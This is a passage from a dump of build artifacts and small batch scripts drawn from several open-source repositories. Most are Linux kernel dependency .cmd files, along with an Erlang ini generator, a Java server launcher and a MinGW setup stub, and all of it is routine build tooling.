/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/sys/stat.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/bits/stat.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/sys/time.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/sys/select.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/sys/types.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/sys/sysmacros.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/sys/wait.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/sys/resource.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/bits/resource.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/termios.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/bits/termios.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/time.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/sys/param.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/pwd.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/grp.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/mntent.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/sys/statfs.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/sys/statvfs.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/bits/statfs.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/utmp.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/utmpx.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/locale.h \
/Volumes/ELFSOSX/tools/lib/gcc/arm-linux-musleabihf/4.7.3/../../../../arm-linux-musleabihf/include/arpa/inet.h \
include/pwd_.h \
include/grp_.h \
include/shadow_.h \
include/xatonum.h \
util-linux/rdev.o: $(deps_util-linux/rdev.o)
$(deps_util-linux/rdev.o):
| ThinkIntegrate/busybox | util-linux/.rdev.o.cmd | bat | gpl-2.0 | 11,351 |
cmd_drivers/nfc/built-in.o := rm -f drivers/nfc/built-in.o; /home/adam/Android/Toolchains/arm-eabi-4.4.3/bin/arm-eabi-ar rcs drivers/nfc/built-in.o
| arshull/GalaTab3_Kernel | drivers/nfc/.built-in.o.cmd | bat | gpl-2.0 | 149 |
ng new %* --style=scss --routing --skip-install --minimal --skip-git --skip-commit --skip-tests
rem ng g module my-router-module --routing | delafer/j7project | angular6/j9project/others/cmd/ngnew.cmd | bat | gpl-2.0 | 138 |
cmd_sound/usb/built-in.o := ld -m elf_x86_64 -r -o sound/usb/built-in.o sound/usb/misc/built-in.o sound/usb/usx2y/built-in.o sound/usb/caiaq/built-in.o
| Existed/kernel-2.6.35.14 | sound/usb/.built-in.o.cmd | bat | gpl-2.0 | 156 |
cmd_lib/rwsem-spinlock.o := /opt/arm-2008q1/bin/arm-none-linux-gnueabi-gcc -Wp,-MD,lib/.rwsem-spinlock.o.d -nostdinc -isystem /data/linux/opt/arm-2008q1/bin/../lib/gcc/arm-none-linux-gnueabi/4.2.3/include -Iinclude -I/data/embedded/acer/acergit/linux/arch/arm/include -include include/linux/autoconf.h -D__KERNEL__ -mlittle-endian -Iarch/arm/mach-pnx67xx/include -Iarch/arm/plat-pnx/include -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-declaration -Os -marm -fno-omit-frame-pointer -mapcs -mno-sched-prolog -mabi=aapcs-linux -mno-thumb-interwork -D__LINUX_ARM_ARCH__=5 -march=armv5te -mtune=arm9tdmi -msoft-float -Uarm -fno-stack-protector -fno-omit-frame-pointer -fno-optimize-sibling-calls -g -Wdeclaration-after-statement -Wno-pointer-sign -fwrapv -D"KBUILD_STR(s)=\#s" -D"KBUILD_BASENAME=KBUILD_STR(rwsem_spinlock)" -D"KBUILD_MODNAME=KBUILD_STR(rwsem_spinlock)" -c -o lib/rwsem-spinlock.o lib/rwsem-spinlock.c
deps_lib/rwsem-spinlock.o := \
lib/rwsem-spinlock.c \
$(wildcard include/config/debug/lock/alloc.h) \
include/linux/rwsem.h \
$(wildcard include/config/rwsem/generic/spinlock.h) \
include/linux/linkage.h \
include/linux/compiler.h \
$(wildcard include/config/trace/branch/profiling.h) \
$(wildcard include/config/profile/all/branches.h) \
$(wildcard include/config/enable/must/check.h) \
$(wildcard include/config/enable/warn/deprecated.h) \
include/linux/compiler-gcc.h \
$(wildcard include/config/arch/supports/optimized/inlining.h) \
$(wildcard include/config/optimize/inlining.h) \
include/linux/compiler-gcc4.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/linkage.h \
include/linux/types.h \
$(wildcard include/config/uid16.h) \
$(wildcard include/config/lbd.h) \
$(wildcard include/config/phys/addr/t/64bit.h) \
$(wildcard include/config/64bit.h) \
include/linux/posix_types.h \
include/linux/stddef.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/posix_types.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/types.h \
include/asm-generic/int-ll64.h \
include/linux/kernel.h \
$(wildcard include/config/preempt/voluntary.h) \
$(wildcard include/config/debug/spinlock/sleep.h) \
$(wildcard include/config/prove/locking.h) \
$(wildcard include/config/printk.h) \
$(wildcard include/config/dynamic/printk/debug.h) \
$(wildcard include/config/numa.h) \
$(wildcard include/config/ftrace/mcount/record.h) \
/data/linux/opt/arm-2008q1/bin/../lib/gcc/arm-none-linux-gnueabi/4.2.3/include/stdarg.h \
include/linux/bitops.h \
$(wildcard include/config/generic/find/first/bit.h) \
$(wildcard include/config/generic/find/last/bit.h) \
$(wildcard include/config/generic/find/next/bit.h) \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/bitops.h \
$(wildcard include/config/smp.h) \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/system.h \
$(wildcard include/config/cpu/xsc3.h) \
$(wildcard include/config/cpu/sa1100.h) \
$(wildcard include/config/cpu/sa110.h) \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/memory.h \
$(wildcard include/config/mmu.h) \
$(wildcard include/config/page/offset.h) \
$(wildcard include/config/dram/size.h) \
$(wildcard include/config/dram/base.h) \
$(wildcard include/config/zone/dma.h) \
$(wildcard include/config/discontigmem.h) \
$(wildcard include/config/sparsemem.h) \
include/linux/const.h \
arch/arm/plat-pnx/include/mach/memory.h \
$(wildcard include/config/nkernel.h) \
$(wildcard include/config/mach/pnx/realloc.h) \
$(wildcard include/config/android/pmem.h) \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/sizes.h \
include/asm-generic/memory_model.h \
$(wildcard include/config/flatmem.h) \
$(wildcard include/config/sparsemem/vmemmap.h) \
include/linux/irqflags.h \
$(wildcard include/config/trace/irqflags.h) \
$(wildcard include/config/irqsoff/tracer.h) \
$(wildcard include/config/preempt/tracer.h) \
$(wildcard include/config/trace/irqflags/support.h) \
$(wildcard include/config/x86.h) \
include/linux/typecheck.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/irqflags.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/ptrace.h \
$(wildcard include/config/arm/thumb.h) \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/hwcap.h \
include/asm/nkern.h \
$(wildcard include/config/nkernel/console.h) \
include/asm/nk/f_nk.h \
include/asm/nk/nk_f.h \
include/asm-generic/cmpxchg-local.h \
include/asm-generic/cmpxchg.h \
include/asm-generic/bitops/non-atomic.h \
include/asm-generic/bitops/fls64.h \
include/asm-generic/bitops/sched.h \
include/asm-generic/bitops/hweight.h \
include/asm-generic/bitops/lock.h \
include/linux/log2.h \
$(wildcard include/config/arch/has/ilog2/u32.h) \
$(wildcard include/config/arch/has/ilog2/u64.h) \
include/linux/ratelimit.h \
include/linux/param.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/param.h \
$(wildcard include/config/hz.h) \
include/linux/dynamic_printk.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/byteorder.h \
include/linux/byteorder/little_endian.h \
include/linux/swab.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/swab.h \
include/linux/byteorder/generic.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/bug.h \
$(wildcard include/config/bug.h) \
$(wildcard include/config/debug/bugverbose.h) \
include/asm-generic/bug.h \
$(wildcard include/config/generic/bug.h) \
$(wildcard include/config/generic/bug/relative/pointers.h) \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/atomic.h \
include/asm-generic/atomic.h \
include/linux/rwsem-spinlock.h \
include/linux/spinlock.h \
$(wildcard include/config/debug/spinlock.h) \
$(wildcard include/config/generic/lockbreak.h) \
$(wildcard include/config/preempt.h) \
include/linux/preempt.h \
$(wildcard include/config/debug/preempt.h) \
$(wildcard include/config/preempt/notifiers.h) \
include/linux/thread_info.h \
$(wildcard include/config/compat.h) \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/thread_info.h \
$(wildcard include/config/arm/thumbee.h) \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/fpstate.h \
$(wildcard include/config/vfpv3.h) \
$(wildcard include/config/iwmmxt.h) \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/domain.h \
$(wildcard include/config/io/36.h) \
include/linux/list.h \
$(wildcard include/config/debug/list.h) \
include/linux/poison.h \
include/linux/prefetch.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/processor.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/cache.h \
$(wildcard include/config/arm/l1/cache/shift.h) \
$(wildcard include/config/aeabi.h) \
include/linux/stringify.h \
include/linux/bottom_half.h \
include/linux/spinlock_types.h \
include/linux/spinlock_types_up.h \
include/linux/lockdep.h \
$(wildcard include/config/lockdep.h) \
$(wildcard include/config/lock/stat.h) \
$(wildcard include/config/generic/hardirqs.h) \
include/linux/spinlock_up.h \
include/linux/spinlock_api_up.h \
include/linux/sched.h \
$(wildcard include/config/sched/debug.h) \
$(wildcard include/config/no/hz.h) \
$(wildcard include/config/detect/softlockup.h) \
$(wildcard include/config/core/dump/default/elf/headers.h) \
$(wildcard include/config/bsd/process/acct.h) \
$(wildcard include/config/taskstats.h) \
$(wildcard include/config/audit.h) \
$(wildcard include/config/inotify/user.h) \
$(wildcard include/config/epoll.h) \
$(wildcard include/config/posix/mqueue.h) \
$(wildcard include/config/keys.h) \
$(wildcard include/config/user/sched.h) \
$(wildcard include/config/sysfs.h) \
$(wildcard include/config/schedstats.h) \
$(wildcard include/config/task/delay/acct.h) \
$(wildcard include/config/fair/group/sched.h) \
$(wildcard include/config/rt/group/sched.h) \
$(wildcard include/config/blk/dev/io/trace.h) \
$(wildcard include/config/preempt/rcu.h) \
$(wildcard include/config/cc/stackprotector.h) \
$(wildcard include/config/x86/ptrace/bts.h) \
$(wildcard include/config/sysvipc.h) \
$(wildcard include/config/auditsyscall.h) \
$(wildcard include/config/rt/mutexes.h) \
$(wildcard include/config/debug/mutexes.h) \
$(wildcard include/config/task/xacct.h) \
$(wildcard include/config/cpusets.h) \
$(wildcard include/config/cgroups.h) \
$(wildcard include/config/futex.h) \
$(wildcard include/config/fault/injection.h) \
$(wildcard include/config/latencytop.h) \
$(wildcard include/config/function/graph/tracer.h) \
$(wildcard include/config/tracing.h) \
$(wildcard include/config/have/unstable/sched/clock.h) \
$(wildcard include/config/hotplug/cpu.h) \
$(wildcard include/config/preempt/bkl.h) \
$(wildcard include/config/group/sched.h) \
$(wildcard include/config/mm/owner.h) \
include/linux/capability.h \
$(wildcard include/config/security/file/capabilities.h) \
include/linux/threads.h \
$(wildcard include/config/nr/cpus.h) \
$(wildcard include/config/base/small.h) \
include/linux/timex.h \
include/linux/time.h \
include/linux/cache.h \
$(wildcard include/config/arch/has/cache/line/size.h) \
include/linux/seqlock.h \
include/linux/math64.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/div64.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/timex.h \
arch/arm/plat-pnx/include/mach/timex.h \
include/linux/jiffies.h \
include/linux/rbtree.h \
include/linux/cpumask.h \
$(wildcard include/config/disable/obsolete/cpumask/functions.h) \
$(wildcard include/config/cpumask/offstack.h) \
$(wildcard include/config/debug/per/cpu/maps.h) \
include/linux/bitmap.h \
include/linux/string.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/string.h \
include/linux/errno.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/errno.h \
include/asm-generic/errno.h \
include/asm-generic/errno-base.h \
include/linux/nodemask.h \
$(wildcard include/config/highmem.h) \
include/linux/numa.h \
$(wildcard include/config/nodes/shift.h) \
include/linux/mm_types.h \
$(wildcard include/config/split/ptlock/cpus.h) \
$(wildcard include/config/proc/fs.h) \
$(wildcard include/config/mmu/notifier.h) \
include/linux/auxvec.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/auxvec.h \
include/linux/prio_tree.h \
include/linux/completion.h \
include/linux/wait.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/current.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/page.h \
$(wildcard include/config/cpu/copy/v3.h) \
$(wildcard include/config/cpu/copy/v4wt.h) \
$(wildcard include/config/cpu/copy/v4wb.h) \
$(wildcard include/config/cpu/copy/feroceon.h) \
$(wildcard include/config/cpu/xscale.h) \
$(wildcard include/config/cpu/copy/v6.h) \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/glue.h \
$(wildcard include/config/cpu/arm610.h) \
$(wildcard include/config/cpu/arm710.h) \
$(wildcard include/config/cpu/abrt/lv4t.h) \
$(wildcard include/config/cpu/abrt/ev4.h) \
$(wildcard include/config/cpu/abrt/ev4t.h) \
$(wildcard include/config/cpu/abrt/ev5tj.h) \
$(wildcard include/config/cpu/abrt/ev5t.h) \
$(wildcard include/config/cpu/abrt/ev6.h) \
$(wildcard include/config/cpu/abrt/ev7.h) \
$(wildcard include/config/cpu/pabrt/ifar.h) \
$(wildcard include/config/cpu/pabrt/noifar.h) \
include/asm-generic/page.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/mmu.h \
$(wildcard include/config/cpu/has/asid.h) \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/cputime.h \
include/asm-generic/cputime.h \
include/linux/smp.h \
$(wildcard include/config/use/generic/smp/helpers.h) \
include/linux/sem.h \
include/linux/ipc.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/ipcbuf.h \
include/linux/kref.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/sembuf.h \
include/linux/rcupdate.h \
$(wildcard include/config/classic/rcu.h) \
$(wildcard include/config/tree/rcu.h) \
include/linux/percpu.h \
$(wildcard include/config/modules.h) \
include/linux/slab.h \
$(wildcard include/config/slab/debug.h) \
$(wildcard include/config/debug/objects.h) \
$(wildcard include/config/slub.h) \
$(wildcard include/config/slob.h) \
$(wildcard include/config/debug/slab.h) \
include/linux/gfp.h \
$(wildcard include/config/zone/dma32.h) \
include/linux/mmzone.h \
$(wildcard include/config/force/max/zoneorder.h) \
$(wildcard include/config/unevictable/lru.h) \
$(wildcard include/config/memory/hotplug.h) \
$(wildcard include/config/arch/populates/node/map.h) \
$(wildcard include/config/flat/node/mem/map.h) \
$(wildcard include/config/cgroup/mem/res/ctlr.h) \
$(wildcard include/config/have/memory/present.h) \
$(wildcard include/config/need/node/memmap/size.h) \
$(wildcard include/config/need/multiple/nodes.h) \
$(wildcard include/config/have/arch/early/pfn/to/nid.h) \
$(wildcard include/config/sparsemem/extreme.h) \
$(wildcard include/config/nodes/span/other/nodes.h) \
$(wildcard include/config/holes/in/zone.h) \
include/linux/init.h \
$(wildcard include/config/hotplug.h) \
include/linux/pageblock-flags.h \
$(wildcard include/config/hugetlb/page.h) \
$(wildcard include/config/hugetlb/page/size/variable.h) \
include/linux/bounds.h \
include/linux/memory_hotplug.h \
$(wildcard include/config/have/arch/nodedata/extension.h) \
$(wildcard include/config/memory/hotremove.h) \
include/linux/notifier.h \
include/linux/mutex.h \
include/linux/mutex-debug.h \
include/linux/srcu.h \
include/linux/topology.h \
$(wildcard include/config/sched/smt.h) \
$(wildcard include/config/sched/mc.h) \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/topology.h \
include/asm-generic/topology.h \
include/linux/slub_def.h \
$(wildcard include/config/slub/stats.h) \
$(wildcard include/config/slub/debug.h) \
include/linux/workqueue.h \
include/linux/timer.h \
$(wildcard include/config/timer/stats.h) \
$(wildcard include/config/debug/objects/timers.h) \
include/linux/ktime.h \
$(wildcard include/config/ktime/scalar.h) \
include/linux/debugobjects.h \
$(wildcard include/config/debug/objects/free.h) \
include/linux/kobject.h \
include/linux/sysfs.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/percpu.h \
include/asm-generic/percpu.h \
$(wildcard include/config/have/setup/per/cpu/area.h) \
include/linux/rcuclassic.h \
$(wildcard include/config/rcu/cpu/stall/detector.h) \
include/linux/signal.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/signal.h \
include/asm-generic/signal.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/sigcontext.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/siginfo.h \
include/asm-generic/siginfo.h \
include/linux/fs_struct.h \
include/linux/path.h \
include/linux/pid.h \
include/linux/proportions.h \
include/linux/percpu_counter.h \
include/linux/seccomp.h \
$(wildcard include/config/seccomp.h) \
include/linux/rtmutex.h \
$(wildcard include/config/debug/rt/mutexes.h) \
include/linux/plist.h \
$(wildcard include/config/debug/pi/list.h) \
include/linux/resource.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/resource.h \
include/asm-generic/resource.h \
include/linux/hrtimer.h \
$(wildcard include/config/high/res/timers.h) \
include/linux/task_io_accounting.h \
$(wildcard include/config/task/io/accounting.h) \
include/linux/latencytop.h \
include/linux/cred.h \
$(wildcard include/config/security.h) \
include/linux/key.h \
$(wildcard include/config/sysctl.h) \
include/linux/sysctl.h \
include/linux/aio.h \
$(wildcard include/config/aio.h) \
include/linux/aio_abi.h \
include/linux/uio.h \
include/linux/module.h \
$(wildcard include/config/modversions.h) \
$(wildcard include/config/unused/symbols.h) \
$(wildcard include/config/kallsyms.h) \
$(wildcard include/config/markers.h) \
$(wildcard include/config/tracepoints.h) \
$(wildcard include/config/module/unload.h) \
include/linux/stat.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/stat.h \
include/linux/kmod.h \
include/linux/elf.h \
include/linux/elf-em.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/elf.h \
$(wildcard include/config/gcov/profile.h) \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/user.h \
include/linux/moduleparam.h \
$(wildcard include/config/alpha.h) \
$(wildcard include/config/ia64.h) \
$(wildcard include/config/ppc64.h) \
include/linux/marker.h \
include/linux/tracepoint.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/local.h \
include/asm-generic/local.h \
/data/embedded/acer/acergit/linux/arch/arm/include/asm/module.h \
lib/rwsem-spinlock.o: $(deps_lib/rwsem-spinlock.o)
$(deps_lib/rwsem-spinlock.o):
| yohanes/Acer-BeTouch-E130-Linux-Kernel | lib/.rwsem-spinlock.o.cmd | bat | gpl-2.0 | 17,523 |
@echo off
cls
set CLASSPATH=..\api\jogre.jar
set CLASSPATH=%CLASSPATH%;.
set CLASSPATH=%CLASSPATH%;classes
set CLASSPATH=%CLASSPATH%;lib\dom4j.jar
set CLASSPATH=%CLASSPATH%;lib\mysql-connector-java-3.1.12-bin.jar
set CLASSPATH=%CLASSPATH%;lib\hsqldb.jar
set CLASSPATH=%CLASSPATH%;lib\ibatis-2.3.0.677.jar
java org.jogre.server.JogreServer
| lsilvestre/Jogre | server/server.bat | bat | gpl-2.0 | 341 |
cmd_fs/cifs/cifs.ko := ../tools/arm-bcm2708/arm-bcm2708hardfp-linux-gnueabi/bin/arm-bcm2708hardfp-linux-gnueabi-ld -EL -r -T ./scripts/module-common.lds --build-id -o fs/cifs/cifs.ko fs/cifs/cifs.o fs/cifs/cifs.mod.o
| avareldalton85/rpi2-linux-rt | fs/cifs/.cifs.ko.cmd | bat | gpl-2.0 | 219 |
@echo off
REM erl.ini rebuilder
REM
REM This script exists because on Windows, certain dependencies fail with
REM "cannot find erlexec.exe", and because reltool doesn't copy the erl.ini file
REM from the standard ERTS (nor should it, since it's pointing at the wrong
REM locations for this particular release), we generate it based on the current
REM directory.
REM
REM Further, if you were to move the nitrogen directory to a different location,
REM the previously generated INI files would again be pointing at the wrong
REM location, so we rebuild it every time before we compile.
dir /X /B ERTS-*>>%TEMP%\erts.txt
set /p ERTS=<%TEMP%\erts.txt
set INIFILE=%ERTS%\bin\erl.ini
set PWD=%cd:\=\\%
echo Generating new erl.ini file in %INIFILE%
echo [erlang]>%INIFILE%
echo Bindir=%PWD%\\%ERTS%\\bin>>%INIFILE%
echo Progname=erl>>%INIFILE%
echo Rootdir=%PWD%>>%INIFILE%
del %TEMP%\erts.txt
| SovereignPrime/RISE | rel/overlay/win/files/build-ini.bat | bat | gpl-2.0 | 893 |
cmd_drivers/video/msm/msm_mipi.o := /home/gabe/arm-2009q3/arm-2009q3/bin/arm-none-linux-gnueabi-ld -EL -r -o drivers/video/msm/msm_mipi.o drivers/video/msm/mipi_dsi.o drivers/video/msm/mipi_dsi_host.o
| dagnarf/sgh-i717-dagkernel | drivers/video/msm/.msm_mipi.o.cmd | bat | gpl-2.0 | 205 |
cmd_drivers/base/power/built-in.o := /opt/toolchains/arm-2009q3/bin/arm-none-eabi-ld -EL -r -o drivers/base/power/built-in.o drivers/base/power/sysfs.o drivers/base/power/main.o drivers/base/power/generic_ops.o
| dizgustipated/BOCA-2.6.35.14 | drivers/base/power/.built-in.o.cmd | bat | gpl-2.0 | 216 |
cmd_arch/powerpc/sysdev/dcr-low.o := ppc_4xx-gcc -m32 -Wp,-MD,arch/powerpc/sysdev/.dcr-low.o.d -nostdinc -isystem /tools/dev/eldk/usr/bin/../lib/gcc/powerpc-linux/4.2.2/include -I/tools/dev/repos/linux-2.6-xlnx/arch/powerpc/include -Iinclude -include include/generated/autoconf.h -D__KERNEL__ -Iarch/powerpc -D__ASSEMBLY__ -Iarch/powerpc -Wa,-m405 -gdwarf-2 -c -o arch/powerpc/sysdev/dcr-low.o arch/powerpc/sysdev/dcr-low.S
deps_arch/powerpc/sysdev/dcr-low.o := \
arch/powerpc/sysdev/dcr-low.S \
/tools/dev/repos/linux-2.6-xlnx/arch/powerpc/include/asm/ppc_asm.h \
$(wildcard include/config/virt/cpu/accounting.h) \
$(wildcard include/config/ppc64.h) \
$(wildcard include/config/ppc601/sync/fix.h) \
$(wildcard include/config/ppc/cell.h) \
$(wildcard include/config/smp.h) \
$(wildcard include/config/4xx.h) \
$(wildcard include/config/8xx.h) \
$(wildcard include/config/ibm440ep/err42.h) \
$(wildcard include/config/booke.h) \
$(wildcard include/config/ppc/book3s/64.h) \
$(wildcard include/config/40x.h) \
include/linux/init.h \
$(wildcard include/config/modules.h) \
$(wildcard include/config/hotplug.h) \
include/linux/compiler.h \
$(wildcard include/config/trace/branch/profiling.h) \
$(wildcard include/config/profile/all/branches.h) \
$(wildcard include/config/enable/must/check.h) \
$(wildcard include/config/enable/warn/deprecated.h) \
include/linux/stringify.h \
/tools/dev/repos/linux-2.6-xlnx/arch/powerpc/include/asm/asm-compat.h \
$(wildcard include/config/power4/only.h) \
$(wildcard include/config/ibm405/err77.h) \
/tools/dev/repos/linux-2.6-xlnx/arch/powerpc/include/asm/types.h \
$(wildcard include/config/phys/64bit.h) \
include/asm-generic/int-ll64.h \
/tools/dev/repos/linux-2.6-xlnx/arch/powerpc/include/asm/bitsperlong.h \
include/asm-generic/bitsperlong.h \
$(wildcard include/config/64bit.h) \
/tools/dev/repos/linux-2.6-xlnx/arch/powerpc/include/asm/processor.h \
$(wildcard include/config/vsx.h) \
$(wildcard include/config/ppc32.h) \
$(wildcard include/config/ppc/prep.h) \
$(wildcard include/config/task/size.h) \
$(wildcard include/config/kernel/start.h) \
$(wildcard include/config/altivec.h) \
$(wildcard include/config/spe.h) \
/tools/dev/repos/linux-2.6-xlnx/arch/powerpc/include/asm/reg.h \
$(wildcard include/config/fsl/emb/perfmon.h) \
$(wildcard include/config/ppc/book3s/32.h) \
$(wildcard include/config/ppc/book3e/64.h) \
$(wildcard include/config/e200.h) \
/tools/dev/repos/linux-2.6-xlnx/arch/powerpc/include/asm/cputable.h \
$(wildcard include/config/mpc10x/bridge.h) \
$(wildcard include/config/ppc/83xx.h) \
$(wildcard include/config/8260.h) \
$(wildcard include/config/ppc/mpc52xx.h) \
$(wildcard include/config/bdi/switch.h) \
$(wildcard include/config/power3.h) \
$(wildcard include/config/power4.h) \
$(wildcard include/config/44x.h) \
$(wildcard include/config/e500.h) \
/tools/dev/repos/linux-2.6-xlnx/arch/powerpc/include/asm/feature-fixups.h \
/tools/dev/repos/linux-2.6-xlnx/arch/powerpc/include/asm/reg_booke.h \
$(wildcard include/config/403gcx.h) \
/tools/dev/repos/linux-2.6-xlnx/arch/powerpc/include/asm/ppc-opcode.h \
/tools/dev/repos/linux-2.6-xlnx/arch/powerpc/include/asm/bug.h \
$(wildcard include/config/bug.h) \
$(wildcard include/config/debug/bugverbose.h) \
/tools/dev/repos/linux-2.6-xlnx/arch/powerpc/include/asm/asm-offsets.h \
include/generated/asm-offsets.h \
include/asm-generic/bug.h \
$(wildcard include/config/generic/bug.h) \
$(wildcard include/config/generic/bug/relative/pointers.h) \
arch/powerpc/sysdev/dcr-low.o: $(deps_arch/powerpc/sysdev/dcr-low.o)
$(deps_arch/powerpc/sysdev/dcr-low.o):
| mattkelly/linux-2.6-xlnx | arch/powerpc/sysdev/.dcr-low.o.cmd | bat | gpl-2.0 | 3,810 |
cmd_scripts/kconfig/lxdialog/inputbox.o := gcc -Wp,-MD,scripts/kconfig/lxdialog/.inputbox.o.d -Wall -Wmissing-prototypes -Wstrict-prototypes -O2 -fomit-frame-pointer -I/usr/include/ncurses -DCURSES_LOC="<ncurses.h>" -DLOCALE -c -o scripts/kconfig/lxdialog/inputbox.o scripts/kconfig/lxdialog/inputbox.c
deps_scripts/kconfig/lxdialog/inputbox.o := \
scripts/kconfig/lxdialog/inputbox.c \
scripts/kconfig/lxdialog/dialog.h \
/usr/include/sys/types.h \
/usr/include/features.h \
/usr/include/sys/cdefs.h \
/usr/include/bits/wordsize.h \
/usr/include/gnu/stubs.h \
/usr/include/gnu/stubs-64.h \
/usr/include/bits/types.h \
/usr/lib/gcc/x86_64-redhat-linux/4.1.2/include/stddef.h \
/usr/include/bits/typesizes.h \
/usr/include/time.h \
/usr/include/endian.h \
/usr/include/bits/endian.h \
/usr/include/sys/select.h \
/usr/include/bits/select.h \
/usr/include/bits/sigset.h \
/usr/include/bits/time.h \
/usr/include/sys/sysmacros.h \
/usr/include/bits/pthreadtypes.h \
/usr/include/fcntl.h \
/usr/include/bits/fcntl.h \
/usr/include/unistd.h \
/usr/include/bits/posix_opt.h \
/usr/include/bits/confname.h \
/usr/include/getopt.h \
/usr/include/ctype.h \
/usr/include/stdlib.h \
/usr/include/alloca.h \
/usr/include/string.h \
/usr/include/bits/string.h \
/usr/include/bits/string2.h \
/usr/lib/gcc/x86_64-redhat-linux/4.1.2/include/stdbool.h \
/usr/include/libintl.h \
/usr/include/locale.h \
/usr/include/bits/locale.h \
/usr/include/ncurses/ncurses.h \
/usr/include/ncurses/ncurses_dll.h \
/usr/include/stdio.h \
/usr/include/libio.h \
/usr/include/_G_config.h \
/usr/include/wchar.h \
/usr/include/bits/wchar.h \
/usr/include/gconv.h \
/usr/lib/gcc/x86_64-redhat-linux/4.1.2/include/stdarg.h \
/usr/include/bits/stdio_lim.h \
/usr/include/bits/sys_errlist.h \
/usr/include/bits/stdio.h \
/usr/include/ncurses/unctrl.h \
/usr/include/ncurses/curses.h \
scripts/kconfig/lxdialog/inputbox.o: $(deps_scripts/kconfig/lxdialog/inputbox.o)
$(deps_scripts/kconfig/lxdialog/inputbox.o):
| mattkelly/linux-2.6-xlnx | scripts/kconfig/lxdialog/.inputbox.o.cmd | bat | gpl-2.0 | 2,082 |
@echo # Premake for MinGW
@echo # (C) 2016, Ricyn Lee
:: MinGW\bin·¾¶ÉèÖÃ,½áβ²»Ð´'\'
@set MingwBinPath=C:\ProgramFiles\MinGW\bin
:: ÉèÖÃPATH
